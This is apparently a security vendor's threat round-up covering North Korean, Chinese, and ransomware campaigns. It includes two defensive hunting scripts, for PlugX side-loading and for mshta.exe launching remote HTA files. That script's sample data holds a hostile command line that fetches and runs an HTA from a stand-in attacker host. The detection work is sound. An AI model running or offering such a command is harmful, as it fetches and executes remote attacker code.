Author:
Kaustubh Jagtap, Product Marketing Director, SafeBreach
In this version of the Hacker’s Playbook Threat Coverage round-up, we are highlighting attack coverage for newly discovered or analyzed threats by the SafeBreach Labs team. SafeBreach customers can select and run these attacks and more from the SafeBreach Hacker’s Playbook to ensure coverage against these advanced threats. Additional details about the threats and our coverage can be seen below.
Microsoft Threat Intelligence recently identified a new North Korean threat actor associated with attacks on individuals and organizations in the software and information technology, education, and defense industrial base sectors. This actor, tracked as Moonstone Sleet (formerly Storm-1789), has been observed combining TTPs commonly used by other North Korean threat actors with several unique techniques to achieve its objectives of financial gain and cyberespionage. Moonstone Sleet is a North Korean state-affiliated threat actor that reuses code from Diamond Sleet malware and several of that group’s techniques, and that gains initial access to victim networks via social media.
According to the researchers, these threat actors set up fake companies and job opportunities to engage with potential targets. They then delivered trojanized versions of legitimate tools, a fully functional malicious game, and a new custom ransomware, FakePenny. FakePenny consists of a loader and an encryptor and has been used primarily for intelligence collection and revenue generation. The ransom note it leaves behind is strikingly similar to the one the threat actor Seashell Blizzard used when distributing the NotPetya malware.
The SafeBreach platform was updated with the following new attacks to ensure our customers can validate their security controls against this ransomware variant:
A ransomware attack that impacted several major hospitals in London has been formally attributed to the Russian threat group Qilin. The attack targeted Synnovis – a partnership between Guy’s and St Thomas’ NHS Foundation Trust and King’s College Hospitals NHS Trust. Investigators believe the Qilin ransomware gang applied the double-extortion model: first stealing and encrypting data, then threatening to publish it if the ransom was not paid. The attack interrupted pathology services across the two hospitals as well as other primary care services across the boroughs of Bexley, Greenwich, Lewisham, Bromley, Southwark, and Lambeth, and has been labeled an ongoing critical incident.
Qilin is a ransomware-as-a-service (RaaS) affiliate program that uses Rust-based ransomware against its victims. Most Qilin attacks are customized for each targeted victim; the operators achieve this by changing the file extension applied to encrypted files and by terminating specific processes and services. Qilin advertises the ransomware on the dark web and can generate samples for both Windows and ESXi targets.
The SafeBreach platform was updated with the following new attacks to ensure our customers can validate their security controls against this ransomware variant:
Sophos researchers recently uncovered a new ransomware campaign that abuses legitimate Sophos executables and DLLs: the attackers overwrite the original content of those files with loader code that decrypts and runs a malicious payload. Based on the initial information available, this affects version 2022.4.3 of Sophos’ Windows Endpoint product.
The campaign was discovered when Sophos’ new C2 interceptor detected and flagged a Brute Ratel C2 connection attempt on a customer network. Further analysis showed that the code at the entry point of the abused binary had been overwritten with the malicious loader code, and that the encrypted payload was stored as a resource in the file’s resource section. When the researchers analyzed the Cobalt Strike beacon executable, they likewise identified the TitanLdr loader, a complex multifunction shellcode. Additional details about the campaign can be found on the Sophos website.
The SafeBreach platform was updated with the following new attacks to ensure our customers can validate their security controls against this trojan variant:
Sygnia researchers observed a Chinese state-sponsored threat actor, tracked as Velvet Ant, conducting espionage operations after maintaining persistence in a large organizational network for over three years. The actor gained its foothold in the victim network by exploiting two legacy F5 BIG-IP appliances (including a load balancer) whose operating systems had not been updated.
The techniques used by Velvet Ant are similar to those used by other Chinese state-sponsored threat actors. Researchers highlighted that Velvet Ant consistently hijacked execution flow by leveraging different methods, such as DLL search order hijacking, Phantom DLL loading, and DLL side loading. During this attack, Velvet Ant leveraged the PlugX malware, a remote access trojan (RAT) that can remain dormant on victim networks for months. PlugX is primarily used to provide remote access to infected victim systems.
The PlugX execution chain in this network consisted of three files: ‘iviewers.exe’, ‘iviewers.dll’ and ‘iviewers.dll.ui’.
When ‘iviewers.exe’ is executed, the three files are copied to a subdirectory with a non-fixed name under ‘C:\ProgramData’ (or ‘C:\Documents and Settings\All Users\Application Data’ on Windows Server 2003 systems), and ‘iviewers.exe’ is installed as a Windows service. Several ‘svchost’ processes are then launched, and malicious code is injected into them.
The group’s ability to adapt quickly and pivot between methods to maintain its foothold shows how continuously it refines its techniques to evade detection.
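One way to hunt for the PlugX execution chain described above is to correlate service-installation records with a file inventory and look for a service binary under ProgramData that has a same-named .dll and .dll.ui beside it. This is an added example, not Sygnia’s or SafeBreach’s code; the service events and the file inventory below are constructed sample telemetry.

```python
"""Hunt for the PlugX three-file chain above: a service binary under ProgramData
with a same-named .dll and .dll.ui beside it. Added example, not Sygnia's or
SafeBreach's code; all inputs below are constructed sample telemetry."""
import re

# Drop roots named in the report; the malware picks a non-fixed subdirectory name.
SUSPECT_ROOTS = (
    r"c:\programdata",
    r"c:\documents and settings\all users\application data",  # Windows Server 2003
)

def _under_suspect_root(path):
    """True if path sits in a subdirectory (not the top level) of a suspect root."""
    low = path.lower()
    for root in SUSPECT_ROOTS:
        if low.startswith(root + "\\"):
            return "\\" in low[len(root) + 1:]
    return False

def _exe_from_image_path(image_path):
    # A service ImagePath may be quoted and may carry arguments after the .exe.
    m = re.match(r'\s*"?([^"]+?\.exe)"?(\s|$)', image_path, re.IGNORECASE)
    return m.group(1) if m else None

def find_sideload_triads(service_events, file_inventory):
    """service_events: (host, service_name, image_path), e.g. from System log
    event 7045; file_inventory: {host: [paths]}. Returns suspicious triads."""
    inventory = {h: {p.lower() for p in ps} for h, ps in file_inventory.items()}
    hits = []
    for host, name, image_path in service_events:
        exe = _exe_from_image_path(image_path)
        if not exe or not _under_suspect_root(exe):
            continue
        stem = exe[:-4].lower()  # strip ".exe"
        files = inventory.get(host, set())
        if stem + ".dll" in files and stem + ".dll.ui" in files:
            hits.append((host, name, exe))
    return hits

SAMPLE_EVENTS = [  # constructed
    ("ws01", "iviewers", r'"C:\ProgramData\x7Qk2\iviewers.exe"'),
    ("ws01", "Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("ws02", "Updater", r"C:\ProgramData\Vendor\updater.exe -svc"),
]
SAMPLE_INVENTORY = {  # constructed; ws02 has no .dll.ui, so it is not flagged
    "ws01": [r"C:\ProgramData\x7Qk2\iviewers.exe", r"C:\ProgramData\x7Qk2\iviewers.dll",
             r"C:\ProgramData\x7Qk2\iviewers.dll.ui"],
    "ws02": [r"C:\ProgramData\Vendor\updater.exe", r"C:\ProgramData\Vendor\updater.dll"],
}
```

A legitimate vendor directory with only an .exe and .dll is deliberately not flagged, which keeps the rule focused on the three-file pattern the report describes.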
The SafeBreach platform was updated with the following attacks to ensure our customers can validate their security controls against this malware:
Threat researchers from Imperva have identified threat actors exploiting CVE-2024-4577, a PHP vulnerability, to deliver malware, including the “TellYouThePass” ransomware. The attackers used a known exploit for CVE-2024-4577 to execute arbitrary PHP code on victim systems, calling PHP’s “system” function to launch the mshta.exe binary against an HTML application (HTA) file hosted on an attacker-controlled web server. The use of “mshta.exe” reflects the attackers’ sophistication and their reliance on “living off the land” techniques.
Upon initial execution, the sample sends an HTTP request to the command-and-control (C2) server containing details about the infected machine, as a notification of infection. The callback masquerades as a request for CSS resources, likely to evade detection. The binary then enumerates directories, kills processes, generates encryption keys, and encrypts the files in each enumerated directory that carry a targeted file extension. Finally, the malware writes a ReadMe message named “READ_ME10.html” to the web root directory, containing the ransom instructions.
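The mshta.exe step above is the most detectable point in this chain on the endpoint: a remote HTA being launched from a process tree that starts at the web server. The following rule, an added example rather than Imperva’s or SafeBreach’s code, classifies process-creation records; the records are constructed in the shape of Sysmon event 1, the hostnames are placeholders, and the set of parent process names treated as web-server context is an assumption to adjust for the deployed stack.

```python
"""Flag mshta.exe launching a remote HTML application, the living-off-the-land
step in the TellYouThePass chain above. Added example, not Imperva's or
SafeBreach's code. Records are constructed, in the shape of Sysmon event 1
(Image, CommandLine, ParentImage, plus an optional ParentChain list)."""
import re

# Assumption: these parents mean a web request reached the OS shell (e.g. via
# PHP's system()); adjust the list to the web stack actually deployed.
WEB_PARENTS = {"php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify_mshta(record):
    """Return None, or (severity, url) for one process-creation record."""
    if _basename(record["Image"]) != "mshta.exe":
        return None
    m = URL_RE.search(record["CommandLine"])
    if not m:
        return None  # local .hta files are routine installer/admin behaviour
    # Walk the whole parent chain: an intermediate cmd.exe must not hide the
    # web-server origin that a PHP system() call produces.
    parents = [_basename(p) for p in record.get("ParentChain", [record["ParentImage"]])]
    severity = "critical" if any(p in WEB_PARENTS for p in parents) else "suspicious"
    return severity, m.group(0)

def scan(records):
    """Return (index, severity, url) for every record that trips the rule."""
    hits = []
    for idx, rec in enumerate(records):
        result = classify_mshta(rec)
        if result:
            hits.append((idx,) + result)
    return hits

SAMPLE_EVENTS = [  # constructed; hostnames are placeholders
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://attacker.example/payload.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentChain": [r"C:\Windows\System32\cmd.exe", r"C:\php\php-cgi.exe"]},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Setup\install.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://cdn.example/news.hta",
     "ParentImage": r"C:\Program Files\Outlook\outlook.exe"},
]
```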
The SafeBreach platform was updated with the following attacks to ensure our customers can validate their security controls against this vulnerability:
SafeBreach now offers a complimentary and customized real-world ransomware assessment, RansomwareRx, that allows you to gain unparalleled visibility into how your security ecosystem responds at each stage of the defense process. This ransomware assessment includes:
Empower your team to understand more about ransomware attacks, methodologies, and behaviors—all through the lens of the attacker. Request your complimentary RansomwareRx assessment today.